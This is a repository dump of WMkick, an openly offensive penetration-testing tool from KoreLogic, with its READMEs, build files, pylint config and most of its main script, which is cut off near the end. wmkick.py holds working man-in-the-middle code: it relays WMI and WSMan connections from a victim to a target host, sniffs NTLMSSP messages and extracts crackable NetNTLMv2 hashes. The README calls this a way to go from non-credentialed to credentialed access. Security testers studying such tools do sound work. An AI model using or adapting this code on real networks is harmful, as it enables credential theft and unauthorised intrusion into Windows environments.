├── .gitseed ├── MANIFEST.in ├── README.CREDITS ├── README.HOWTO ├── Makefile ├── wmkick_lib └── __init__.py ├── README ├── README.INSTALL ├── setup.py ├── pylint.rc ├── wmkick.py └── README.LICENSE /.gitseed: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | exclude * 2 | include Makefile 3 | include README 4 | include README.CREDITS 5 | include README.HOWTO 6 | include README.INSTALL 7 | include README.LICENSE 8 | include setup.py 9 | include wmkick.py 10 | include wmkick_lib/*.py 11 | -------------------------------------------------------------------------------- /README.CREDITS: -------------------------------------------------------------------------------- 1 | Table of Contents 2 | 3 | Section 1 .................... Credits 4 | Section 2 .................... Sponsors 5 | Section 3 .................... Maintainers 6 | 7 | 1 Credits 8 | 9 | Thanks to all those who have contributed to this project. Any 10 | contribution that moves the project forward is appreciated. Those 11 | who have made noteworthy contributions are listed below in 12 | alphabetical order. 13 | 14 | Hunt, Houston 15 | Monroe, Klayton 16 | Segreti, Joe 17 | 18 | 2 Sponsors 19 | 20 | Thanks to our sponsors listed below in chronological order. 21 | 22 | KoreLogic (2020-present) 23 | 24 | 3 Maintainers 25 | 26 | Thanks to our maintainers listed below in alphabetical order. 27 | 28 | Hunt, Houston 29 | 30 | -------------------------------------------------------------------------------- /README.HOWTO: -------------------------------------------------------------------------------- 1 | 2 | To use WMkick, you need at least three hosts: 1) a victim Windows 3 | host, 2) a WMkick redirection host, and 3) a target Windows host 4 | accepting WMI (TCP/135), WSMAN HTTP (5985/TCP), or WSMAN HTTPS 5 | (5986) requests via NTLMSSP is required. 6 | 7 | Since WMkick is a Man-In-The-Middle (MITM) utility, you must 8 | arrange to have authentication requests from the victim host 9 | flow through the WMkick host on their way to the target host. The 10 | diagram below depicts the required setup and traffic flows. 11 | 12 | +----------+ +----------+ +----------+ 13 | | |----------->| | | | 14 | | Victim | | WMkick |------------>| Target | 15 | | Host | | Host |<------------| Host | 16 | | |<-----------| | | | 17 | +----------+ +----------+ +----------+ 18 | 19 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: 3 | @ echo "Usage: make build " ; \ 4 | echo " make check" ; \ 5 | echo " make clean" ; \ 6 | echo " make clean-all" ; \ 7 | echo " make dist" ; \ 8 | echo " make install" ; \ 9 | echo " make install-dev" ; \ 10 | echo " make lint" ; \ 11 | echo " make sdist (alias for dist)" ; \ 12 | echo " make tests (alias for check)" ; \ 13 | echo " make uninstall-dev" ; \ 14 | echo " make vbump" ; \ 15 | 16 | build:: 17 | @ python3 setup.py build 18 | 19 | check: 20 | @ ( cd tests && make $@ ) 21 | 22 | clean: 23 | @ rm -f MANIFEST `find . -name "*.pyc" -o -name "*~" -o -name "*.lint"` 24 | @ rm -rf build wmkick.egg-info `find . -name __pycache__ -type d` 25 | 26 | clean-all: clean 27 | 28 | dist sdist:: 29 | @ python3 setup.py sdist 30 | 31 | install: build 32 | @ python3 setup.py install 33 | 34 | install-dev: 35 | @ python3 setup.py --quiet develop --user 36 | 37 | lint: 38 | @ for file in `find . -name "*.py" | egrep -v '(__init__|setup)[.]py'` ; do echo "$${file} --> $${file}.lint" ; pylint --rcfile=pylint.rc --exit-zero $${file} > $${file}.lint ; done 39 | 40 | tests: check 41 | 42 | uninstall-dev: 43 | @ python3 setup.py --quiet develop --uninstall --user > /dev/null 2>&1 44 | @ rm -f ~/.local/bin/wmkick.py 45 | 46 | vbump: 47 | @ version_helper_git_pep440 -b + -f wmkick_lib/__init__.py 48 | 49 | -------------------------------------------------------------------------------- /wmkick_lib/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Copyright 2020-2021 The WMkick Project, All Rights Reserved. 3 | 4 | This software, having been partly or wholly developed and/or 5 | sponsored by KoreLogic, Inc., is hereby released under the terms 6 | and conditions set forth in the project's "README.LICENSE" file. 7 | For a list of all contributors and sponsors, please refer to the 8 | project's "README.CREDITS" file. 9 | """ 10 | 11 | VERSION = 0x00302800 12 | 13 | def get_release_number(): 14 | """Return the current release version as a number.""" 15 | return VERSION 16 | 17 | def get_release_string_pep440(): 18 | """Return the current release version as a string (PEP 440 compliant).""" 19 | major = (VERSION >> 28) & 0x0f 20 | minor = (VERSION >> 20) & 0xff 21 | patch = (VERSION >> 12) & 0xff 22 | state = (VERSION >> 10) & 0x03 23 | build = VERSION & 0x03ff 24 | if state == 0: 25 | state_string = "dev" 26 | elif state == 1: 27 | state_string = "rc" 28 | elif state == 2: 29 | state_string = "post" 30 | elif state == 3: 31 | state_string = "post" 32 | release_string = "unknown" 33 | if state == 2 and build == 0: 34 | release_string = '%d.%d.%d' % (major, minor, patch) 35 | else: 36 | if state == 3: 37 | build = build + 0x400 38 | release_string = '%d.%d.%d.%s%d' % (major, minor, patch, state_string, build) 39 | return release_string 40 | 41 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | 2 | Table of Contents 3 | 4 | Section 1 .................... Overview 5 | Section 2 .................... Documentation 6 | Section 3 .................... License 7 | Section 4 .................... References 8 | 9 | 1 Overview 10 | 11 | WMkick is a TCP protocol redirector/MITM tool that targets NTLM 12 | authentication message flows in WMI (135/tcp) and 13 | Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2 14 | hashes. Once a hash has been captured, popular cracking tools such 15 | as Hashcat and JtR can be used to recover plaintext passwords. 16 | WMkick automates the hash extraction process and alleviates the 17 | need to build/use a WMI (or WSMAN) Auth Server or perform manual 18 | packet analysis. 19 | 20 | A use case for WMkick is for internal penetration tests. If the 21 | penetration tester can redirect these protocols to their own 22 | Windows virtual machine or remote target hosting WMI or WSMan 23 | services, it is possible to obtain a valid NetNTLMv2 hash, which 24 | can be cracked into a plaintext credential, in order to go from 25 | a non-credentialed to credentialed perspective. A possible 26 | situation that may be observed in the target environment is 27 | software or administrative scripts running remote WMI or WSMan 28 | commands over a subnet in which wmkick is running, the attacker 29 | may take advantage of this. 30 | 31 | 2 Documentation 32 | 33 | See README.INSTALL for requirements and instructions on how to 34 | build, test, and install this software. 35 | 36 | 3 License 37 | 38 | The terms and conditions under which this software is released are 39 | set forth in README.LICENSE. 40 | 41 | 4 References 42 | 43 | The NT LAN Manager (NTLM) Authentication Protocol is documented 44 | here: 45 | 46 | https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf 47 | 48 | -------------------------------------------------------------------------------- /README.INSTALL: -------------------------------------------------------------------------------- 1 | 2 | Table of Contents 3 | 4 | Section 1 .................... Requirements 5 | Section 2 .................... Installation 6 | Section 2.1 .................. Production Install 7 | Section 2.2................... Developmental Install 8 | 9 | 1 Requirements 10 | 11 | WMkick is known to work on Linux platforms running Python 3.7.3 or 12 | higher. The minimum required Python version is 3.3. Other platforms 13 | and earlier versions of Python may work, but have not been tested. 14 | 15 | WMkick requires the following external modules: 16 | 17 | - coloredlogs (https://pypi.org/project/coloredlogs/) 18 | - scapy (https://pypi.org/project/scapy/) 19 | 20 | The installation process requires Python's setuptools. Depending on 21 | your environment, setuptools can be installed as documented below. 22 | 23 | Gentoo: 24 | 25 | $ sudo emerge -av setuptools 26 | 27 | Debian-ish: 28 | 29 | $ sudo apt install python-setuptools 30 | 31 | Python: 32 | 33 | $ pip3 install setuptools 34 | 35 | 2 Installation 36 | 37 | Two forms of installation are supported: production and 38 | developmental. Use the production form if your goal is to 39 | install the software and use it in some official capacity. Use 40 | the developmental form if your goal is to evaluate, test, or 41 | develop the software. 42 | 43 | 2.1 Production Install 44 | 45 | To install this software in the appropriate Python site-packages 46 | directory for your system, run: 47 | 48 | $ sudo make install 49 | 50 | Standalone scripts will be installed under /usr/local/bin. 51 | 52 | 2.2 Developmental Install 53 | 54 | To install this software for evaluation, testing, or development 55 | purposes, run: 56 | 57 | $ make install-dev 58 | 59 | This will install a placeholder in Python's site-packages under 60 | ~/.local that points to the top-level source directory (assuming 61 | that's where you are currently located). Any modifications made 62 | to the code will automatically be reflected when running the 63 | software. Additionally, user-executable scripts will be placed 64 | under ~/.local/bin. Make sure that ~/.local/bin is in your PATH. 65 | 66 | Note that this environment can be torn down, if no longer needed, 67 | with: 68 | 69 | $ make uninstall-dev 70 | 71 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """Configuration script for packaging project.""" 3 | 4 | from distutils.command.sdist import sdist 5 | from pkgutil import find_loader 6 | from sys import platform, stderr, version_info 7 | from setuptools import find_packages, setup 8 | 9 | from wmkick_lib import get_release_string_pep440 10 | 11 | # Disable version normalization performed by setup(). This code 12 | # indirectly depends on the CustomSDist class to handle our 'rc' 13 | # version numbers, which have the following format: 'X.Y.Z.rcN'. 14 | # The desired package name format is: 'package-X.Y.Z.rcN.tar.gz'. 15 | # Without CustomSDist, we get: 'package-X.Y.ZrcN.tar.gz' (i.e., 16 | # the '.' separator between 'Z' and 'rcN' has been eliminated. 17 | # The patch/workaround below is documented here: 18 | # 19 | # https://github.com/pypa/setuptools/issues/308 20 | # 21 | try: 22 | # Try the approach of using sic(), added in setuptools 46.1.0. 23 | from setuptools import sic 24 | except ImportError: 25 | # Try the approach of replacing packaging.version.Version. 26 | sic = lambda v: v 27 | try: 28 | # Note that setuptools >=39.0.0 uses packaging from setuptools.extern. 29 | from setuptools.extern import packaging 30 | except ImportError: 31 | # Note that setuptools <39.0.0 uses packaging from pkg_resources.extern. 32 | from pkg_resources.extern import packaging 33 | packaging.version.Version = packaging.version.LegacyVersion 34 | 35 | class CustomSDist(sdist): 36 | 37 | def run(self): 38 | super().run() 39 | 40 | def prune_file_list(self): 41 | """Prune off branches that might slip into the file list as created 42 | by 'read_template()', but really don't belong there: 43 | * the build tree (typically "build") 44 | * the release tree itself (only an issue if we ran "sdist" 45 | previously with --keep-temp, or it aborted) 46 | * any RCS, CVS, .svn, .hg, .git*, .bzr, _darcs directories 47 | """ 48 | build = self.get_finalized_command('build') 49 | base_dir = self.distribution.get_fullname() 50 | 51 | self.filelist.exclude_pattern(None, prefix=build.build_base) 52 | self.filelist.exclude_pattern(None, prefix=base_dir) 53 | 54 | # pruning out vcs directories 55 | # both separators are used under win32 56 | if platform == 'win32': 57 | seps = r'/|\\' 58 | else: 59 | seps = '/' 60 | 61 | vcs_dirs = ['RCS', 'CVS', r'\.svn', r'\.hg', r'\.git.*', r'\.bzr', '_darcs'] 62 | vcs_ptrn = r'(^|%s)(%s)(%s).*' % (seps, '|'.join(vcs_dirs), seps) 63 | self.filelist.exclude_pattern(vcs_ptrn, is_regex=1) 64 | 65 | def get_install_requires(): 66 | """Returns a list of required modules.""" 67 | install_requires = ['coloredlogs', 'scapy'] 68 | if find_loader('kargparse'): 69 | install_requires.append('kargparse') 70 | return install_requires 71 | 72 | if version_info < (3, 3, 0): 73 | print("This project requires Python version 3.3.0 or higher.", file=stderr) 74 | exit(2) 75 | 76 | setup( 77 | author='Houston Hunt', 78 | author_email='hhunt.git@korelogic.com', 79 | classifiers=['Operating System :: POSIX :: Linux'], 80 | cmdclass={'sdist': CustomSDist}, 81 | description="""A WMI and Powershell-Remoting/WSMan/WinRM TCP protocol redirector/MITM tool to capture NetNTLMv2 hashes.""", 82 | install_requires=get_install_requires(), 83 | license='GPL-3', 84 | long_description= 85 | """ 86 | WMkick is a TCP protocol redirector/MITM tool that targets 87 | NTLM authentication message flows in WMI (135/tcp) and 88 | Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2 89 | hashes. Once a hash has been captured, popular cracking tools such 90 | as Hashcat and JtR can be used to recover plaintext passwords. 91 | WMkick automates the hash extraction process and alleviates the 92 | need to build/use a WMI (or WSMAN) Auth Server or perform manual 93 | packet analysis. 94 | """, 95 | name='wmkick', 96 | packages=find_packages(), 97 | platforms=['Linux'], 98 | scripts=['wmkick.py'], 99 | url='https://www.korelogic.com', 100 | version=sic(get_release_string_pep440()) 101 | ) 102 | 103 | -------------------------------------------------------------------------------- /pylint.rc: -------------------------------------------------------------------------------- 1 | [MASTER] 2 | 3 | # Specify a configuration file. 4 | #rcfile= 5 | 6 | # Python code to execute, usually for sys.path manipulation such as 7 | # pygtk.require(). 8 | #init-hook= 9 | 10 | # Profiled execution. 11 | profile=no 12 | 13 | # Add files or directories to the blacklist. They should be base names, not 14 | # paths. 15 | ignore=CVS 16 | 17 | # Pickle collected data for later comparisons. 18 | persistent=yes 19 | 20 | # List of plugins (as comma separated values of python modules names) to load, 21 | # usually to register additional checkers. 22 | load-plugins= 23 | 24 | 25 | [MESSAGES CONTROL] 26 | 27 | # Enable the message, report, category or checker with the given id(s). You can 28 | # either give multiple identifier separated by comma (,) or put this option 29 | # multiple time. 30 | #enable= 31 | 32 | # Disable the message, report, category or checker with the given id(s). You 33 | # can either give multiple identifier separated by comma (,) or put this option 34 | # multiple time (only on the command line, not in the configuration file where 35 | # it should appear only once). 36 | disable=C0301,C0305,R0903,R0913,W0703,W0603 37 | 38 | 39 | [REPORTS] 40 | 41 | # Set the output format. Available formats are text, parseable, colorized, msvs 42 | # (visual studio) and html 43 | output-format=parseable 44 | 45 | # Include message's id in output 46 | include-ids=no 47 | 48 | # Put messages in a separate file for each module / package specified on the 49 | # command line instead of printing them on stdout. Reports (if any) will be 50 | # written in a file name "pylint_global.[txt|html]". 51 | files-output=no 52 | 53 | # Tells whether to display a full report or only the messages 54 | reports=yes 55 | 56 | # Python expression which should return a note less than 10 (10 is the highest 57 | # note). You have access to the variables errors warning, statement which 58 | # respectively contain the number of errors / warnings messages and the total 59 | # number of statements analyzed. This is used by the global evaluation report 60 | # (RP0004). 61 | evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) 62 | 63 | # Add a comment according to your evaluation note. This is used by the global 64 | # evaluation report (RP0004). 65 | comment=no 66 | 67 | 68 | [BASIC] 69 | 70 | # Required attributes for module, separated by a comma 71 | required-attributes= 72 | 73 | # List of builtins function names that should not be used, separated by a comma 74 | bad-functions=map,filter,apply,input 75 | 76 | # Regular expression which should only match correct module names 77 | module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ 78 | 79 | # Regular expression which should only match correct module level names 80 | const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ 81 | 82 | # Regular expression which should only match correct class names 83 | class-rgx=[A-Z_][a-zA-Z0-9]+$ 84 | 85 | # Regular expression which should only match correct function names 86 | function-rgx=[a-z_][a-z0-9_]{2,30}$ 87 | 88 | # Regular expression which should only match correct method names 89 | method-rgx=[a-z_][a-z0-9_]{2,30}$ 90 | 91 | # Regular expression which should only match correct instance attribute names 92 | attr-rgx=[a-z_][a-z0-9_]{2,30}$ 93 | 94 | # Regular expression which should only match correct argument names 95 | argument-rgx=[a-z_][a-z0-9_]{2,30}$ 96 | 97 | # Regular expression which should only match correct variable names 98 | variable-rgx=[a-z_][a-z0-9_]{2,30}$ 99 | 100 | # Regular expression which should only match correct list comprehension / 101 | # generator expression variable names 102 | inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ 103 | 104 | # Good variable names which should always be accepted, separated by a comma 105 | good-names=i,j,k,ex,Run,_ 106 | 107 | # Bad variable names which should always be refused, separated by a comma 108 | bad-names=foo,bar,baz,toto,tutu,tata 109 | 110 | # Regular expression which should only match functions or classes name which do 111 | # not require a docstring 112 | no-docstring-rgx=__.*__ 113 | 114 | 115 | [FORMAT] 116 | 117 | # Maximum number of characters on a single line. 118 | max-line-length=120 119 | 120 | # Maximum number of lines in a module 121 | max-module-lines=5000 122 | 123 | # String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 124 | # tab). 125 | indent-string=' ' 126 | 127 | 128 | [TYPECHECK] 129 | 130 | # Tells whether missing members accessed in mixin class should be ignored. A 131 | # mixin class is detected if its name ends with "mixin" (case insensitive). 132 | ignore-mixin-members=yes 133 | 134 | # List of classes names for which member attributes should not be checked 135 | # (useful for classes with attributes dynamically set). 136 | ignored-classes=SQLObject 137 | 138 | # When zope mode is activated, add a predefined set of Zope acquired attributes 139 | # to generated-members. 140 | zope=no 141 | 142 | # List of members which are set dynamically and missed by pylint inference 143 | # system, and so shouldn't trigger E0201 when accessed. Python regular 144 | # expressions are accepted. 145 | generated-members=REQUEST,acl_users,aq_parent 146 | 147 | 148 | [SIMILARITIES] 149 | 150 | # Minimum lines number of a similarity. 151 | min-similarity-lines=4 152 | 153 | # Ignore comments when computing similarities. 154 | ignore-comments=yes 155 | 156 | # Ignore docstrings when computing similarities. 157 | ignore-docstrings=yes 158 | 159 | 160 | [VARIABLES] 161 | 162 | # Tells whether we should check for unused import in __init__ files. 163 | init-import=no 164 | 165 | # A regular expression matching the beginning of the name of dummy variables 166 | # (i.e. not used). 167 | dummy-variables-rgx=_|dummy 168 | 169 | # List of additional names supposed to be defined in builtins. Remember that 170 | # you should avoid to define new builtins when possible. 171 | additional-builtins= 172 | 173 | 174 | [MISCELLANEOUS] 175 | 176 | # List of note tags to take in consideration, separated by a comma. 177 | notes=FIXME,XXX,TODO 178 | 179 | 180 | [CLASSES] 181 | 182 | # List of interface methods to ignore, separated by a comma. This is used for 183 | # instance to not check methods defines in Zope's Interface base class. 184 | ignore-iface-methods=isImplementedBy,deferred,extends,names,namesAndDescriptions,queryDescriptionFor,getBases,getDescriptionFor,getDoc,getName,getTaggedValue,getTaggedValueTags,isEqualOrExtendedBy,setTaggedValue,isImplementedByInstancesOf,adaptWith,is_implemented_by 185 | 186 | # List of method names used to declare (i.e. assign) instance attributes. 187 | defining-attr-methods=__init__,__new__,setUp 188 | 189 | # List of valid names for the first argument in a class method. 190 | valid-classmethod-first-arg=cls 191 | 192 | 193 | [IMPORTS] 194 | 195 | # Deprecated modules which should not be used, separated by a comma 196 | deprecated-modules=regsub,TERMIOS,Bastion,rexec 197 | 198 | # Create a graph of every (i.e. internal and external) dependencies in the 199 | # given file (report RP0402 must not be disabled) 200 | import-graph= 201 | 202 | # Create a graph of external dependencies in the given file (report RP0402 must 203 | # not be disabled) 204 | ext-import-graph= 205 | 206 | # Create a graph of internal dependencies in the given file (report RP0402 must 207 | # not be disabled) 208 | int-import-graph= 209 | 210 | 211 | [DESIGN] 212 | 213 | # Maximum number of arguments for function / method 214 | max-args=5 215 | 216 | # Argument names that match this expression will be ignored. Default to name 217 | # with leading underscore 218 | ignored-argument-names=_.* 219 | 220 | # Maximum number of locals for function / method body 221 | max-locals=15 222 | 223 | # Maximum number of return / yield for function / method body 224 | max-returns=6 225 | 226 | # Maximum number of branch for function / method body 227 | max-branchs=12 228 | 229 | # Maximum number of statements in function / method body 230 | max-statements=50 231 | 232 | # Maximum number of parents for a class (see R0901). 233 | max-parents=7 234 | 235 | # Maximum number of attributes for a class (see R0902). 236 | max-attributes=7 237 | 238 | # Minimum number of public methods for a class (see R0903). 239 | min-public-methods=2 240 | 241 | # Maximum number of public methods for a class (see R0904). 242 | max-public-methods=20 243 | 244 | 245 | [EXCEPTIONS] 246 | 247 | # Exceptions that will emit a warning when being caught. Defaults to 248 | # "Exception" 249 | overgeneral-exceptions=Exception 250 | -------------------------------------------------------------------------------- /wmkick.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Copyright 2020-2021 The WMkick Project, All Rights Reserved. 4 | 5 | This software, having been partly or wholly developed and/or 6 | sponsored by KoreLogic, Inc., is hereby released under the terms 7 | and conditions set forth in the project's "README.LICENSE" file. 8 | For a list of all contributors and sponsors, please refer to the 9 | project's "README.CREDITS" file. 10 | """ 11 | 12 | __description__ = """ 13 | WMkick is a TCP protocol redirector/MITM tool that targets 14 | NTLM authentication message flows in WMI (135/tcp) and 15 | Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2 16 | hashes. Once a hash has been captured, popular cracking tools such as 17 | Hashcat and JtR can be used to recover plaintext passwords. WMkick 18 | automates the hash extraction process and alleviates the need to 19 | build/use a WMI (or WSMAN) Authentication Server or perform manual 20 | packet analysis. 21 | """ 22 | 23 | from base64 import b64decode 24 | from codecs import encode 25 | from collections import defaultdict, OrderedDict 26 | from errno import ECONNRESET 27 | from signal import signal, SIGINT 28 | from ipaddress import IPv4Address, AddressValueError 29 | from logging import addLevelName, Filter, getLogger, StreamHandler 30 | from os import geteuid 31 | from re import compile as re_compile, DOTALL 32 | from socket import AF_INET, SHUT_RDWR, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR 33 | from socket import error as sock_error, gaierror, getfqdn, gethostbyname, socket 34 | from struct import unpack 35 | from sys import stderr, stdout 36 | from threading import Thread 37 | 38 | from coloredlogs import ColoredFormatter 39 | from scapy.all import sniff 40 | 41 | from wmkick_lib import get_release_string_pep440 42 | 43 | try: 44 | from kargparse.parser import KArgumentParser as ArgumentParser 45 | except ImportError: 46 | from argparse import ArgumentParser 47 | 48 | BANNER = r""" 49 | ___ ______ ___ _ _ _ 50 | \ \ / / \/ | | _(_) ___| | __ 51 | \ \ /\ / /| | | | |/ / |/ __| |/ / 52 | \ V V / | |\/| | <| | (__| < 53 | \__/\__/ |__| |__|_|\_\_|\___|_|\_\ 54 | Author: Houston Hunt, KoreLogic, Inc.""" 55 | 56 | MSG_TYPES = defaultdict(lambda: "UNKNOWN") 57 | MSG_TYPES[1] = "Request" 58 | MSG_TYPES[2] = "Challenge" 59 | MSG_TYPES[3] = "Response" 60 | HASH_LOG_LEVEL = 45 61 | WMI_PORT = 135 62 | WSMAN_HTTP_PORT = 5985 63 | WSMAN_HTTPS_PORT = 5986 64 | 65 | class NetNTLMv2Data: 66 | """ 67 | Holds all information about a NetNTLMv2 Hash, which is built from 68 | elements of NTLMSSP negotiation messages. 69 | """ 70 | def __init__(self, dport): 71 | if dport == WMI_PORT: 72 | self.tcp_protocol = "WMI" 73 | elif dport == WSMAN_HTTP_PORT: 74 | self.tcp_protocol = "WSMAN_HTTP" 75 | else: 76 | self.tcp_protocol = None 77 | self.username = None 78 | self.domain = None 79 | self.server_challenge = None 80 | self.ntlm_blob_hmac = None 81 | self.ntlm_blob = None 82 | self.logger = getLogger(__name__) 83 | 84 | def log_complete(self): 85 | """ 86 | Return true if all elements necessary to build a NetNTLMv2 hash 87 | exist. 88 | """ 89 | ntlm_hash_components = dict(vars(self).items()) 90 | if None in ntlm_hash_components.values(): 91 | return False 92 | 93 | self.logger.log(HASH_LOG_LEVEL, "%s Found:\n%s::%s:%s:%s:%s", 94 | self.tcp_protocol, 95 | self.username, 96 | self.domain, 97 | self.server_challenge, 98 | self.ntlm_blob_hmac, 99 | self.ntlm_blob) 100 | return True 101 | 102 | 103 | class RedirectionHandler(Thread): 104 | """ 105 | Redirects a monitored protocol to the target Windows host. 106 | """ 107 | def __init__(self, 108 | group=None, 109 | target=None, 110 | name=None, 111 | args=(), 112 | kwargs=None, 113 | daemon=None, 114 | listen_ip=None, 115 | listen_port=None, 116 | target_ip=None, 117 | target_port=None, 118 | max_connections=16, 119 | logger=None): 120 | 121 | super().__init__(group=group, 122 | target=target, 123 | name=name, 124 | args=args, 125 | kwargs=kwargs, 126 | daemon=daemon) 127 | self.src_ip = listen_ip 128 | self.src_port = listen_port 129 | self.dst_ip = target_ip 130 | self.dst_port = target_port 131 | self.max_connections = max_connections 132 | if logger is None: 133 | self.logger = getLogger(__name__) 134 | else: 135 | self.logger = logger 136 | self.server_socket = socket(AF_INET, SOCK_STREAM) 137 | self.server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 138 | try: 139 | self.server_socket.bind((listen_ip, listen_port)) 140 | self.server_socket.listen(self.max_connections) 141 | except OSError as oserr: 142 | self.logger.error("Check listening ip/port: %s", oserr) 143 | exit(3) 144 | 145 | def run(self): 146 | self.server(self.src_ip, self.src_port, self.dst_ip, self.dst_port) 147 | 148 | def server(self, local_host, local_port, remote_host, remote_port): 149 | """Creates redirection server sockets.""" 150 | self.logger.info('Redirecting traffic from [%s:%d] to [%s:%d]', 151 | local_host, 152 | local_port, 153 | remote_host, 154 | remote_port) 155 | while True: 156 | victim_socket, victim_address = self.server_socket.accept() 157 | self.logger.info("Connection from [%s:%s], attempt REMOTE server [%s:%d]", 158 | victim_address[0], 159 | victim_address[1], 160 | remote_host, 161 | remote_port) 162 | connection_thread = Thread(target=self.connect_target, args=(remote_host, remote_port, victim_socket)) 163 | connection_thread.setDaemon(True) 164 | connection_thread.start() 165 | 166 | def connect_target(self, remote_host, remote_port, victim_socket): 167 | """ 168 | After accepting a connection, create thread to this method to 169 | avoid blocking while connecting to target. 170 | """ 171 | remote_socket = socket(AF_INET, SOCK_STREAM) 172 | try: 173 | remote_socket.connect((remote_host, remote_port)) 174 | svr_soc_thread = Thread(target=self.transfer, args=(remote_socket, victim_socket, False)) 175 | rem_soc_thread = Thread(target=self.transfer, args=(victim_socket, remote_socket, True)) 176 | svr_soc_thread.setDaemon(True) 177 | rem_soc_thread.setDaemon(True) 178 | rem_soc_thread.start() 179 | svr_soc_thread.start() 180 | except sock_error as exception: 181 | remote_socket.close() 182 | victim_socket.close() 183 | self.logger.error("Exception caught as socket.error : %s", exception) 184 | 185 | def transfer(self, src, dst, direction_is_outbound): 186 | """ 187 | Transfers data from redirector/listening host to target 188 | Windows host. 189 | """ 190 | try: 191 | src_address = src.getsockname()[0] 192 | victim_address, victim_port = src.getpeername() 193 | win_host_address, win_host_port = dst.getpeername() 194 | except OSError as oserr: 195 | self.logger.error("Exception caught : %s", oserr) 196 | 197 | while True: 198 | try: 199 | buffer = src.recv(0x1000) 200 | if len(buffer) == 0: # pylint: disable=C1801 201 | break 202 | if direction_is_outbound: 203 | self.logger.debug("%s:%d --- %s --> %s:%d [buff: %d]", 204 | victim_address, 205 | victim_port, 206 | src_address, 207 | win_host_address, 208 | win_host_port, 209 | len(buffer)) 210 | else: 211 | self.logger.debug("%s:%d <-- %s --- %s:%d [buff: %d]", 212 | win_host_address, 213 | win_host_port, 214 | src_address, 215 | victim_address, 216 | victim_port, 217 | len(buffer)) 218 | try: 219 | dst.send(buffer) 220 | except IOError: 221 | pass 222 | 223 | # Pass over connection reset errors. 224 | except sock_error as err: 225 | if err.errno != ECONNRESET: 226 | self.logger.error("Exception caught : %s", err) 227 | break 228 | 229 | try: 230 | if src.fileno() != -1: 231 | src.shutdown(SHUT_RDWR) 232 | src.close() 233 | if dst.fileno() != -1: 234 | dst.shutdown(SHUT_RDWR) 235 | dst.close() 236 | except OSError as err: 237 | if err.errno != 107: 238 | raise 239 | 240 | 241 | class NTLMHandler(Thread): 242 | """ 243 | Captures traffic matching the selected protocols on the victim 244 | and redirector sides, and asynchronously checks for NTLMSSP 245 | message traffic. If found, it stores information in a dictionary 246 | where they key is the ephemeral port and the NetNTLMv2Data 247 | object is the value. Once the final NTLM Authenticate message 248 | is observed, verifies that all required elements are available 249 | to construct and log the hash. 250 | """ 251 | def __init__(self, 252 | group=None, 253 | target=None, 254 | name=None, 255 | args=(), 256 | kwargs=None, 257 | daemon=None, 258 | listen_ip=None, 259 | listen_port=None, 260 | target_ip=None, 261 | logger=None): 262 | 263 | super().__init__(group=group, 264 | target=target, 265 | name=name, 266 | args=args, 267 | kwargs=kwargs, 268 | daemon=daemon) 269 | self.listen_ip = listen_ip 270 | self.listen_port = listen_port 271 | self.target_ip = target_ip 272 | self.tracker = {} # Use dynamic port as a key to track NetNTLMv2Data objects. 273 | if logger is None: 274 | self.logger = getLogger(__name__) 275 | else: 276 | self.logger = logger 277 | 278 | def search_ntlm(self, packet): 279 | """ 280 | Check for NTLMSSP within packet based on TCP protocol found and 281 | store the required hash information based on the step in the 282 | NTLM authentication call flow. 283 | """ 284 | dport = packet.getlayer("TCP").dport 285 | sport = packet.getlayer("TCP").sport 286 | ntlm_data = None 287 | if WMI_PORT in (dport, sport): 288 | if bytes(packet).find(b"NTLMSSP") > 0: 289 | pattern = re_compile(b"NTLMSSP(.*)", DOTALL) 290 | try: 291 | ntlm_data = pattern.search(bytes(packet)).group() 292 | except AttributeError: 293 | return 294 | else: 295 | return 296 | 297 | elif WSMAN_HTTP_PORT in (dport, sport): 298 | if bytes(packet).find(b"Negotiate") > 0: 299 | pattern = re_compile(b"Negotiate (.*?)\r\n") 300 | try: 301 | base64encodeddata = pattern.search(bytes(packet)).group(1) 302 | ntlm_data = b64decode(base64encodeddata) 303 | except AttributeError: 304 | return 305 | except Exception as err: 306 | self.logger.error(err) 307 | return 308 | else: 309 | return 310 | 311 | else: 312 | return 313 | 314 | msg_type = unpack("Q", ntlm_data[24:32])[0], 'x') 324 | self.tracker[packet.getlayer("TCP").dport].server_challenge = chall 325 | elif msg_type == 3: 326 | # This is the Authenticate Message. 327 | # Start after what we know, which is Signature (8b) and Message Type (4b). 328 | # Extract what we need. 329 | ntlm_tup = unpack("hhihhihhihhihhiqiq", ntlm_data[12:76]) 330 | 331 | # Find the domain. 332 | domain_len = ntlm_tup[6] 333 | domain_offset = ntlm_tup[8] 334 | domain = ntlm_data[domain_offset:domain_offset+domain_len].decode('utf-16') 335 | # Find the username. 336 | user_len = ntlm_tup[9] 337 | user_offset = ntlm_tup[11] 338 | username = ntlm_data[user_offset:user_offset+user_len].decode('utf-16') 339 | # Find the challenge/response. 340 | resp_len = ntlm_tup[3] 341 | resp_offset = ntlm_tup[5] 342 | ntchallenge = ntlm_data[resp_offset:resp_offset+resp_len] 343 | ntlm_blob_hmac = encode(ntchallenge, 'hex_codec')[:32].decode('ascii') 344 | ntlm_blob = encode(ntchallenge, 'hex_codec')[32:].decode("ascii") 345 | 346 | # Save information in the tracker dictionary. 347 | sport = packet.getlayer("TCP").sport 348 | self.tracker[sport].domain = domain 349 | self.tracker[sport].username = username 350 | self.tracker[sport].ntlm_blob_hmac = ntlm_blob_hmac 351 | 